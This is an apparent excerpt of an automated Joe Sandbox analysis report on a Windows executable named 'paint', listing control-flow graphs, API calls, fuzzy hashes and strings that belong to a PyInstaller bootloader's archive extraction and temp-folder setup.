                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                                • Opcode ID: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                                                                • Instruction ID: e528fdf8846a88169fbcff59631d6b632cad717047f6798f0291ed39d8d2b1f2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6131f22979fb602daa1a58a3720f236f34d84e0b4625cf851c0130f8f3cebb41
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE819171A1D683B5EB20DB24D0406B963A2EF46784F844431E9AFC77C5FE3EE5858740

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 407 7ff6f0bd1600-7ff6f0bd1611 408 7ff6f0bd1613-7ff6f0bd161c call 7ff6f0bd1050 407->408 409 7ff6f0bd1637-7ff6f0bd1651 call 7ff6f0bd45b0 407->409 414 7ff6f0bd162e-7ff6f0bd1636 408->414 415 7ff6f0bd161e-7ff6f0bd1629 call 7ff6f0bd2710 408->415 416 7ff6f0bd1682-7ff6f0bd169c call 7ff6f0bd45b0 409->416 417 7ff6f0bd1653-7ff6f0bd1681 call 7ff6f0be4f78 call 7ff6f0bd2910 409->417 415->414 424 7ff6f0bd169e-7ff6f0bd16b3 call 7ff6f0bd2710 416->424 425 7ff6f0bd16b8-7ff6f0bd16cf call 7ff6f0be0744 416->425 431 7ff6f0bd1821-7ff6f0bd1824 call 7ff6f0be00bc 424->431 432 7ff6f0bd16d1-7ff6f0bd16f4 call 7ff6f0be4f78 call 7ff6f0bd2910 425->432 433 7ff6f0bd16f9-7ff6f0bd16fd 425->433 440 7ff6f0bd1829-7ff6f0bd183b 431->440 446 7ff6f0bd1819-7ff6f0bd181c call 7ff6f0be00bc 432->446 434 7ff6f0bd16ff-7ff6f0bd170b call 7ff6f0bd1210 433->434 435 7ff6f0bd1717-7ff6f0bd1737 call 7ff6f0be4fb4 433->435 442 7ff6f0bd1710-7ff6f0bd1712 434->442 447 7ff6f0bd1761-7ff6f0bd176c 435->447 448 7ff6f0bd1739-7ff6f0bd175c call 7ff6f0be4f78 call 7ff6f0bd2910 435->448 442->446 446->431 451 7ff6f0bd1802-7ff6f0bd180a call 7ff6f0be4fa0 447->451 452 7ff6f0bd1772-7ff6f0bd1777 447->452 460 7ff6f0bd180f-7ff6f0bd1814 448->460 451->460 455 7ff6f0bd1780-7ff6f0bd17a2 call 7ff6f0be040c 452->455 462 7ff6f0bd17a4-7ff6f0bd17bc call 7ff6f0be0b4c 455->462 463 7ff6f0bd17da-7ff6f0bd17e6 call 7ff6f0be4f78 455->463 460->446 468 7ff6f0bd17c5-7ff6f0bd17d8 call 7ff6f0be4f78 462->468 469 7ff6f0bd17be-7ff6f0bd17c1 462->469 470 7ff6f0bd17ed-7ff6f0bd17f8 call 7ff6f0bd2910 463->470 468->470 469->455 471 7ff6f0bd17c3 469->471 474 7ff6f0bd17fd 470->474 471->474 474->451
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                • Opcode ID: c74b183492ef537dc1c41b7527725f75c115d49e855bc25f8c1e55d00cf8c8f1
                                                                                                                                                                                                                                                                • Instruction ID: b509cb3fbae2eb6ed8520ac792fd666c2ea22f8505926139e2675406166c16cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c74b183492ef537dc1c41b7527725f75c115d49e855bc25f8c1e55d00cf8c8f1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E51C165F0A643B2EB10AB6194005B9A366BF82B94FC44531EE2E877D6FF3EE5458340

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD88F4
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD88FA
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD893C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8A20: GetEnvironmentVariableW.KERNEL32(00007FF6F0BD388E), ref: 00007FF6F0BD8A57
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6F0BD8A79
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BE82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F0BE82C1
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2810: MessageBoxW.USER32 ref: 00007FF6F0BD28EA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                                                • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                                                • Instruction ID: e0653768494b0e64a5ac929e36bcf9a97ad7fbaa9d53d81d11b97cf1b5545436
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5541A311A1A64370FB20AB61A8652B95392AF87BC5FC01131ED2FC77D6FE3EE5059340

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 599 7ff6f0bd1210-7ff6f0bd126d call 7ff6f0bdbdf0 602 7ff6f0bd126f-7ff6f0bd1296 call 7ff6f0bd2710 599->602 603 7ff6f0bd1297-7ff6f0bd12af call 7ff6f0be4fb4 599->603 608 7ff6f0bd12d4-7ff6f0bd12e4 call 7ff6f0be4fb4 603->608 609 7ff6f0bd12b1-7ff6f0bd12cf call 7ff6f0be4f78 call 7ff6f0bd2910 603->609 615 7ff6f0bd12e6-7ff6f0bd1304 call 7ff6f0be4f78 call 7ff6f0bd2910 608->615 616 7ff6f0bd1309-7ff6f0bd131b 608->616 621 7ff6f0bd1439-7ff6f0bd144e call 7ff6f0bdbad0 call 7ff6f0be4fa0 * 2 609->621 615->621 617 7ff6f0bd1320-7ff6f0bd1345 call 7ff6f0be040c 616->617 628 7ff6f0bd1431 617->628 629 7ff6f0bd134b-7ff6f0bd1355 call 7ff6f0be0180 617->629 636 7ff6f0bd1453-7ff6f0bd146d 621->636 628->621 629->628 635 7ff6f0bd135b-7ff6f0bd1367 629->635 637 7ff6f0bd1370-7ff6f0bd1398 call 7ff6f0bda230 635->637 640 7ff6f0bd139a-7ff6f0bd139d 637->640 641 7ff6f0bd1416-7ff6f0bd142c call 7ff6f0bd2710 637->641 643 7ff6f0bd139f-7ff6f0bd13a9 640->643 644 7ff6f0bd1411 640->644 641->628 645 7ff6f0bd13d4-7ff6f0bd13d7 643->645 646 7ff6f0bd13ab-7ff6f0bd13b9 call 7ff6f0be0b4c 643->646 644->641 648 7ff6f0bd13ea-7ff6f0bd13ef 645->648 649 7ff6f0bd13d9-7ff6f0bd13e7 call 7ff6f0bf9ea0 645->649 650 7ff6f0bd13be-7ff6f0bd13c1 646->650 648->637 652 7ff6f0bd13f5-7ff6f0bd13f8 648->652 649->648 653 7ff6f0bd13c3-7ff6f0bd13cd call 7ff6f0be0180 650->653 654 7ff6f0bd13cf-7ff6f0bd13d2 650->654 656 7ff6f0bd13fa-7ff6f0bd13fd 652->656 657 7ff6f0bd140c-7ff6f0bd140f 652->657 653->648 653->654 654->641 656->641 659 7ff6f0bd13ff-7ff6f0bd1407 656->659 657->628 659->617
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                                                                • Opcode ID: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
                                                                                                                                                                                                                                                                • Instruction ID: 6dd0c5d2f4590058812d6be86454b319aa5443a4d6a3686f20d72fa56823c257
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A251C322A09683B1E760AB51A4003BAA292BF86794FC44535ED6FC77C5FF3EE545CB00

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6F0BEF11A,?,?,-00000018,00007FF6F0BEADC3,?,?,?,00007FF6F0BEACBA,?,?,?,00007FF6F0BE5FAE), ref: 00007FF6F0BEEEFC
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6F0BEF11A,?,?,-00000018,00007FF6F0BEADC3,?,?,?,00007FF6F0BEACBA,?,?,?,00007FF6F0BE5FAE), ref: 00007FF6F0BEEF08
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                                • Instruction ID: 6a1bdb23e936fd7f42fef10fe50e52eb6c64d494d97c892e80570c4d225324bd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F341DC61B19A02A1FB56CB16980467523A6BF4AB90FC84539ED3FC77C4FE7EE805C204

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,00007FF6F0BD3804), ref: 00007FF6F0BD36E1
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD3804), ref: 00007FF6F0BD36EB
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2C9E
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6F0BD3706,?,00007FF6F0BD3804), ref: 00007FF6F0BD2D63
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2C50: MessageBoxW.USER32 ref: 00007FF6F0BD2D99
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                                • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                • Instruction ID: 48a944b1a3723ab8dc99759e717684d722368117d21705db7aea60a2791280b3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F121A091B09A42A0FB209B20E9143B6A256BF4A785FC04132D67FC37D6FE2EE505C304

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 744 7ff6f0bebacc-7ff6f0bebaf2 745 7ff6f0bebaf4-7ff6f0bebb08 call 7ff6f0be4f58 call 7ff6f0be4f78 744->745 746 7ff6f0bebb0d-7ff6f0bebb11 744->746 760 7ff6f0bebefe 745->760 747 7ff6f0bebee7-7ff6f0bebef3 call 7ff6f0be4f58 call 7ff6f0be4f78 746->747 748 7ff6f0bebb17-7ff6f0bebb1e 746->748 767 7ff6f0bebef9 call 7ff6f0bea950 747->767 748->747 750 7ff6f0bebb24-7ff6f0bebb52 748->750 750->747 753 7ff6f0bebb58-7ff6f0bebb5f 750->753 757 7ff6f0bebb61-7ff6f0bebb73 call 7ff6f0be4f58 call 7ff6f0be4f78 753->757 758 7ff6f0bebb78-7ff6f0bebb7b 753->758 757->767 763 7ff6f0bebee3-7ff6f0bebee5 758->763 764 7ff6f0bebb81-7ff6f0bebb87 758->764 765 7ff6f0bebf01-7ff6f0bebf18 760->765 763->765 764->763 768 7ff6f0bebb8d-7ff6f0bebb90 764->768 767->760 768->757 771 7ff6f0bebb92-7ff6f0bebbb7 768->771 773 7ff6f0bebbea-7ff6f0bebbf1 771->773 774 7ff6f0bebbb9-7ff6f0bebbbb 771->774 775 7ff6f0bebbf3-7ff6f0bebc1b call 7ff6f0bed66c call 7ff6f0bea9b8 * 2 773->775 776 7ff6f0bebbc6-7ff6f0bebbdd call 7ff6f0be4f58 call 7ff6f0be4f78 call 7ff6f0bea950 773->776 777 7ff6f0bebbe2-7ff6f0bebbe8 774->777 778 7ff6f0bebbbd-7ff6f0bebbc4 774->778 804 7ff6f0bebc1d-7ff6f0bebc33 call 7ff6f0be4f78 call 7ff6f0be4f58 775->804 805 7ff6f0bebc38-7ff6f0bebc63 call 7ff6f0bec2f4 775->805 808 7ff6f0bebd70 776->808 780 7ff6f0bebc68-7ff6f0bebc7f 777->780 778->776 778->777 783 7ff6f0bebc81-7ff6f0bebc89 780->783 784 7ff6f0bebcfa-7ff6f0bebd04 call 7ff6f0bf398c 780->784 783->784 788 7ff6f0bebc8b-7ff6f0bebc8d 783->788 795 7ff6f0bebd8e 784->795 796 7ff6f0bebd0a-7ff6f0bebd1f 784->796 788->784 792 7ff6f0bebc8f-7ff6f0bebca5 788->792 792->784 797 7ff6f0bebca7-7ff6f0bebcb3 792->797 799 7ff6f0bebd93-7ff6f0bebdb3 ReadFile 795->799 796->795 801 7ff6f0bebd21-7ff6f0bebd33 GetConsoleMode 796->801 797->784 802 7ff6f0bebcb5-7ff6f0bebcb7 797->802 806 7ff6f0bebead-7ff6f0bebeb6 GetLastError 799->806 807 7ff6f0bebdb9-7ff6f0bebdc1 799->807 801->795 809 7ff6f0bebd35-7ff6f0bebd3d 801->809 802->784 810 7ff6f0bebcb9-7ff6f0bebcd1 802->810 804->808 805->780 815 7ff6f0bebed3-7ff6f0bebed6 806->815 816 7ff6f0bebeb8-7ff6f0bebece call 7ff6f0be4f78 call 7ff6f0be4f58 806->816 807->806 812 7ff6f0bebdc7 807->812 817 7ff6f0bebd73-7ff6f0bebd7d call 7ff6f0bea9b8 808->817 809->799 814 7ff6f0bebd3f-7ff6f0bebd61 ReadConsoleW 809->814 810->784 818 7ff6f0bebcd3-7ff6f0bebcdf 810->818 823 7ff6f0bebdce-7ff6f0bebde3 812->823 825 7ff6f0bebd82-7ff6f0bebd8c 814->825 826 7ff6f0bebd63 GetLastError 814->826 820 7ff6f0bebedc-7ff6f0bebede 815->820 821 7ff6f0bebd69-7ff6f0bebd6b call 7ff6f0be4eec 815->821 816->808 817->765 818->784 819 7ff6f0bebce1-7ff6f0bebce3 818->819 819->784 829 7ff6f0bebce5-7ff6f0bebcf5 819->829 820->817 821->808 823->817 831 7ff6f0bebde5-7ff6f0bebdf0 823->831 825->823 826->821 829->784 836 7ff6f0bebdf2-7ff6f0bebe0b call 7ff6f0beb6e4 831->836 837 7ff6f0bebe17-7ff6f0bebe1f 831->837 844 7ff6f0bebe10-7ff6f0bebe12 836->844 840 7ff6f0bebe21-7ff6f0bebe33 837->840 841 7ff6f0bebe9b-7ff6f0bebea8 call 7ff6f0beb524 837->841 845 7ff6f0bebe35 840->845 846 7ff6f0bebe8e-7ff6f0bebe96 840->846 841->844 844->817 848 7ff6f0bebe3a-7ff6f0bebe41 845->848 846->817 849 7ff6f0bebe43-7ff6f0bebe47 848->849 850 7ff6f0bebe7d-7ff6f0bebe88 848->850 851 7ff6f0bebe63 849->851 852 7ff6f0bebe49-7ff6f0bebe50 849->852 850->846 854 7ff6f0bebe69-7ff6f0bebe79 851->854 852->851 853 7ff6f0bebe52-7ff6f0bebe56 852->853 853->851 855 7ff6f0bebe58-7ff6f0bebe61 853->855 854->848 856 7ff6f0bebe7b 854->856 855->854 856->846
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
                                                                                                                                                                                                                                                                • Instruction ID: 73fb2b25bce6f392b6c5ee5329a1ff902d42fe0b2e44128e6a0fe611d107e5b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71330427dde7a49afb2283bb308656113f98e0c66a4f806cd66398b14c9322eb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CC1E522A0C687E1E7608B159440ABE77A4EF82B80FD54171EA6F837D1EF7EE8558740

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                                • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                                                • Instruction ID: 0d1b3dee8a3fa41962de25fb3e264486efd0224d3d2be7e44cc11a1d7d7c7d44
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E218531A0C64292EB109B95F45463AE3A5FF86BA1F900235E67EC7BE4EF7ED4448740

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: GetCurrentProcess.KERNEL32 ref: 00007FF6F0BD8780
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: OpenProcessToken.ADVAPI32 ref: 00007FF6F0BD8793
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: GetTokenInformation.KERNELBASE ref: 00007FF6F0BD87B8
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: GetLastError.KERNEL32 ref: 00007FF6F0BD87C2
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: GetTokenInformation.KERNELBASE ref: 00007FF6F0BD8802
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6F0BD881E
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD8760: CloseHandle.KERNEL32 ref: 00007FF6F0BD8836
                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6F0BD3C55), ref: 00007FF6F0BD916C
                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF6F0BD3C55), ref: 00007FF6F0BD9175
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
